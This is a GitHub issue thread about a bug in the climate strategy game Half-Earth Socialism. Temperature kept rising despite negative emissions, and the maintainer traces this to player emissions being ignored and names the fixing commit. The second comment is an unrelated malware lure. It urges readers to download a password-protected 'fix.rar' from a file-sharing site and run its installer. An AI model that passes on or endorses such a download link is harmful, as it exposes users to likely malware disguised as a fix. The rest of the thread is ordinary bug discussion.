### ISSUE TITLE
Game no longer beatable without SRM?

### ISSUE THREAD

**Issue by tessarion87** [frnsys/half_earth#296]
So, this may just be a skill issue on my part, but is there a win path for the game _without_ using SRM? Even with significant negative emissions and other measures (vegan mandate, energy quotas, 3+ levels of ecosystem restoration) and cloud whitening, my global temperature still keeps creeping upward.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sgitkene** [comment]
I observe the same (no lowering in temp). Except that in this run I got the meteorite event which artificially pushed the temp down. But you can still see that negative emissions do not lower temp and in fact it keeps rising. Attached it as a text file to not make the comment too long.
[HES Summary.txt](https://github.com/user-attachments/files/16773540/HES.Summary.txt)

**Comment by frnsys** [comment]
Thanks for the additional info. so this ended up being a pretty critical bug -- basically the player emissions weren't being taken into account at all, which is why the temperature kept rising (it kept going along the default RCP2.6 2050 emissions scenario). This will be fixed by 375522159a2b0fde983c0e5c2b30e1dc753f84be which I'll deploy now!
